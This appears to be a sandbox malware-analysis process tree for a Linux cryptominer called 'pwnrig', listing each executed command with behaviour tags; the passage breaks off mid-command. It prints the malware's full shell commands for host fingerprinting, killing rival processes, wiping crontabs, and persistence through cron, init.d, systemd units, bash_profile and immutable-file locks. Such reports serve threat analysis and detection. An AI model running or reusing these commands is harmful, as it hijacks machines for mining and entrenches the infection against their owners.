    /bin/sh: sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\"" [PID:2535]
      - Attempts to change immutable files
        /usr/bin/hostname: hostname -I [PID:2538]
        /usr/bin/awk: awk "{print \$1}" [PID:2540]
        /usr/bin/awk: awk "{print \"-\"\$2}" [PID:2545]
        /usr/bin/head: head -n 1 [PID:2544]
        /usr/bin/grep: grep "Port " [PID:2543]
        /usr/bin/cat: cat /etc/ssh/sshd_config [PID:2542]
        /usr/bin/whoami: whoami [PID:2546]
        /usr/bin/hostname: hostname [PID:2547]
        /usr/bin/grep: grep -c "^processor" /proc/cpuinfo [PID:2548]
          - Checks CPU configuration
        /usr/bin/sed: sed -e "s/\$//" [PID:2554]
        /usr/bin/sed: sed -e "s/^ *//" [PID:2553]
        /usr/bin/cut: cut -d: -f2 [PID:2552]
        /usr/bin/grep: grep -m 1 "model name" /proc/cpuinfo [PID:2551]
          - Checks CPU configuration
        /usr/bin/awk: awk "{print \$1}" [PID:2557]
        /usr/bin/awk: awk "{print \$4}" [PID:2560]
        /usr/bin/awk: awk "{print \$4}" [PID:2563]
    /bin/sh: sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi" [PID:2564]
        /usr/bin/awk: awk "/[zZ]/ && !a[\$2]++ {print \$2}" [PID:2566]
        /usr/bin/ps: ps -A "-ostat,ppid" [PID:2565]
        /usr/bin/id: id -u [PID:2568]
        /usr/bin/grep: grep -v grep [PID:2571]
        /usr/bin/grep: grep /etc/cron [PID:2570]
        /usr/bin/ps: ps x [PID:2569]
          - Reads CPU attributes
    /bin/sh: sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi" [PID:2573]
      - File and Directory Permissions Modification
      - Writes file to tmp directory
        /usr/bin/id: id -u [PID:2574]
        /usr/bin/id: id -u [PID:2575]
        /usr/bin/chattr: chattr -i -a /bin/bprofr "~/.bash_profile" [PID:2576]
        /usr/bin/rm: rm -rf /bin/bprofr [PID:2577]
        /usr/bin/sed: sed -i /bprofr/d "~/.bash_profile" [PID:2578]
        /usr/bin/cp: cp -f -r -- /tmp/service-agent /bin/bprofr [PID:2579]
          - Writes file to system bin folder
        /usr/bin/id: id -u [PID:2580]
        /usr/bin/chattr: chattr +i +a /bin/bprofr "~/.bash_profile" [PID:2581]
        /usr/bin/mkdir: mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly [PID:2582]
        /usr/bin/chattr: chattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr [PID:2583]
        /usr/bin/rm: rm -rf /bin/crondr [PID:2584]
        /usr/bin/cp: cp -f -r -- /tmp/service-agent /bin/crondr [PID:2585]
          - Writes file to system bin folder
        /usr/bin/tee: tee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig [PID:2587]
          - Creates/modifies Cron job
        /usr/bin/sed: sed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig [PID:2588]
          - Creates/modifies Cron job
          - Reads runtime system information
        /usr/bin/chmod: chmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr [PID:2589]
          - File and Directory Permissions Modification
        /usr/bin/chattr: chattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr [PID:2590]
        /usr/bin/which: which chkconfig [PID:2591]
        /usr/bin/which: which update-rc.d [PID:2592]
        /usr/bin/chattr: chattr -i -a /etc/init.d/pwnrig /bin/initdr [PID:2593]
        /usr/sbin/update-rc.d: update-rc.d -f pwnrig disable [PID:2594]
          - Flushes firewall rules
            /usr/local/sbin/systemctl: systemctl --quiet disable pwnrig [PID:2595]
            /usr/local/bin/systemctl: systemctl --quiet disable pwnrig [PID:2595]
            /usr/sbin/systemctl: systemctl --quiet disable pwnrig [PID:2595]
            /usr/bin/systemctl: systemctl --quiet disable pwnrig [PID:2595]
              - Reads EFI boot settings
            /usr/local/sbin/systemctl: systemctl daemon-reload [PID:2621]
            /usr/local/bin/systemctl: systemctl daemon-reload [PID:2621]
            /usr/sbin/systemctl: systemctl daemon-reload [PID:2621]
            /usr/bin/systemctl: systemctl daemon-reload [PID:2621]
              - Reads EFI boot settings
        /usr/sbin/update-rc.d: update-rc.d -f pwnrig remove [PID:2647]
            /usr/local/sbin/systemctl: systemctl daemon-reload [PID:2648]
            /usr/local/bin/systemctl: systemctl daemon-reload [PID:2648]
            /usr/sbin/systemctl: systemctl daemon-reload [PID:2648]
            /usr/bin/systemctl: systemctl daemon-reload [PID:2648]
              - Reads EFI boot settings
        /usr/bin/rm: rm -rf /bin/initdr [PID:2674]
        /usr/bin/cp: cp -f -r -- /tmp/service-agent /bin/initdr [PID:2675]
          - Writes file to system bin folder
        /usr/bin/tee: tee /etc/init.d/pwnrig [PID:2677]
          - Modifies init.d
        /usr/bin/sed: sed -i "1 s/-e //" /etc/init.d/pwnrig [PID:2678]
          - Modifies init.d
        /usr/bin/chmod: chmod +x /etc/init.d/pwnrig /bin/initdr [PID:2679]
          - File and Directory Permissions Modification
        /usr/sbin/update-rc.d: update-rc.d pwnrig defaults [PID:2680]
            /usr/local/sbin/systemctl: systemctl daemon-reload [PID:2681]
            /usr/local/bin/systemctl: systemctl daemon-reload [PID:2681]
            /usr/sbin/systemctl: systemctl daemon-reload [PID:2681]
            /usr/bin/systemctl: systemctl daemon-reload [PID:2681]
        /usr/sbin/update-rc.d: update-rc.d pwnrig enable [PID:2707]
            /usr/local/sbin/systemctl: systemctl --quiet enable pwnrig [PID:2708]
            /usr/local/bin/systemctl: systemctl --quiet enable pwnrig [PID:2708]
            /usr/sbin/systemctl: systemctl --quiet enable pwnrig [PID:2708]
            /usr/bin/systemctl: systemctl --quiet enable pwnrig [PID:2708]
            /usr/local/sbin/systemctl: systemctl daemon-reload [PID:2709]
            /usr/local/bin/systemctl: systemctl daemon-reload [PID:2709]
            /usr/sbin/systemctl: systemctl daemon-reload [PID:2709]
            /usr/bin/systemctl: systemctl daemon-reload [PID:2709]
        /usr/bin/chattr: chattr +i +a /etc/init.d/pwnrig /bin/initdr [PID:2735]
        /usr/bin/which: which systemctl [PID:2736]
        /usr/bin/chattr: chattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr [PID:2737]
          - Attempts to change immutable files
        /usr/bin/rm: rm -rf /bin/sysdr [PID:2738]
        /usr/bin/cp: cp -f -r -- /tmp/service-agent /bin/sysdr [PID:2739]
          - Writes file to system bin folder
        /usr/bin/tee: tee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service [PID:2741]
          - Modifies systemd
        /usr/bin/sed: sed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service [PID:2742]
        /usr/bin/chattr: chattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr [PID:2743]
        /usr/bin/systemctl: systemctl enable pwnrige.service [PID:2744]
          - Reads EFI boot settings
        /usr/bin/systemctl: systemctl enable pwnrigl.service [PID:2770]
        /usr/bin/systemctl: systemctl daemon-reload [PID:2796]
          - Reads EFI boot settings
        /usr/bin/systemctl: systemctl reload-or-restart pwnrige.service [PID:2822]
          - Reads EFI boot settings
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:2879 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵PID:2903
-
/usr/bin/hostnamehostname -I4⤵PID:2906
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:2908
-
-
/usr/bin/awkawk "{print \"-\"\$2}"4⤵PID:2913
-
-
/usr/bin/headhead -n 14⤵PID:2912
-
-
/usr/bin/grepgrep "Port "4⤵PID:2911
-
-
/usr/bin/catcat /etc/ssh/sshd_config4⤵PID:2910
-
-
/usr/bin/whoamiwhoami4⤵PID:2914
-
-
/usr/bin/hostnamehostname4⤵PID:2915
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:2916
-
-
/usr/bin/sedsed -e "s/\$//"4⤵PID:2922
-
-
/usr/bin/sedsed -e "s/^ *//"4⤵PID:2921
-
-
/usr/bin/cutcut -d: -f24⤵PID:2920
-
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:2919
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:2925
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:2928
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:2931
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:2932
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵PID:2934
-
-
/usr/bin/psps -A "-ostat,ppid"4⤵PID:2933
-
-
/usr/bin/idid -u4⤵PID:2936
-
-
/usr/bin/grepgrep -v grep4⤵PID:2939
-
-
/usr/bin/grepgrep /etc/cron4⤵PID:2938
-
-
/usr/bin/psps x4⤵
- Reads runtime system information
PID:2937
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
- Security Software Discovery
PID:2941 -
/usr/bin/idid -u4⤵PID:2942
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵PID:2947
-
-
/usr/bin/grepgrep -v /usr/sbin/httpd4⤵PID:2946
-
-
/usr/bin/grepgrep -v -- "-bash[[:space:]]*\$"4⤵PID:2945
-
-
/usr/bin/grepgrep -v grep4⤵PID:2944
-
-
/usr/bin/psps aux4⤵
- Process Discovery
PID:2943
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"3⤵
  - Security Software Discovery
  PID:2949
    /usr/bin/id  id -u  PID:2950
    /usr/bin/wc  wc -l  PID:2956
    /usr/bin/awk  awk "{if(\$3>30.0) print \$2}"  PID:2955
    /usr/bin/grep  grep -- "-bash[[:space:]]*\$"  PID:2954
    /usr/bin/grep  grep -v grep  PID:2953
    /usr/bin/ps  ps aux  PID:2952
      - Reads CPU attributes
      - Process Discovery
      - Reads runtime system information

/usr/bin/crontab  crontab -r  PID:2959
/usr/bin/pkill  pkill -f .klibsystem5  PID:2960
  - Reads CPU attributes
  - Reads runtime system information
/usr/bin/pkill  pkill -f .klibsystem4  PID:2961
  - Reads runtime system information
/usr/bin/bash  bash -c "echo \"* * * * * /home/.klibsystem5 >/dev/null 2>&1\" | crontab -"  PID:2962
  /usr/bin/crontab  crontab -  PID:2964
    - Creates/modifies Cron job
/tmp/sys-helper  /tmp/sys-helper  PID:2965
  - Executes dropped EXE
  - Writes file to tmp directory
/tmp/service-agent  /tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn  PID:2966
  - Executes dropped EXE
  - Checks hardware identifiers (DMI)
  - Reads hardware information
  - Checks CPU configuration
  - Enumerates kernel/hardware configuration
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵PID:2967
    /usr/bin/hostname  hostname -I  PID:2970
    /usr/bin/awk  awk "{print \$1}"  PID:2972
    /usr/bin/awk  awk "{print \"-\"\$2}"  PID:2977
    /usr/bin/head  head -n 1  PID:2976
    /usr/bin/grep  grep "Port "  PID:2975
    /usr/bin/cat  cat /etc/ssh/sshd_config  PID:2974
    /usr/bin/whoami  whoami  PID:2978
    /usr/bin/hostname  hostname  PID:2979
    /usr/bin/grep  grep -c "^processor" /proc/cpuinfo  PID:2980
      - Checks CPU configuration
    /usr/bin/sed  sed -e "s/\$//"  PID:2986
    /usr/bin/sed  sed -e "s/^ *//"  PID:2985
    /usr/bin/cut  cut -d: -f2  PID:2984
    /usr/bin/grep  grep -m 1 "model name" /proc/cpuinfo  PID:2983
      - Checks CPU configuration
    /usr/bin/awk  awk "{print \$1}"  PID:2989
    /usr/bin/awk  awk "{print \$4}"  PID:2992
    /usr/bin/awk  awk "{print \$4}"  PID:2995

/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:2996
    /usr/bin/awk  awk "/[zZ]/ && !a[\$2]++ {print \$2}"  PID:2998
    /usr/bin/ps  ps -A "-ostat,ppid"  PID:2997
      - Reads CPU attributes
    /usr/bin/id  id -u  PID:3000
    /usr/bin/grep  grep -v grep  PID:3003
    /usr/bin/grep  grep /etc/cron  PID:3002
    /usr/bin/ps  ps x  PID:3001
      - Reads CPU attributes

/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf 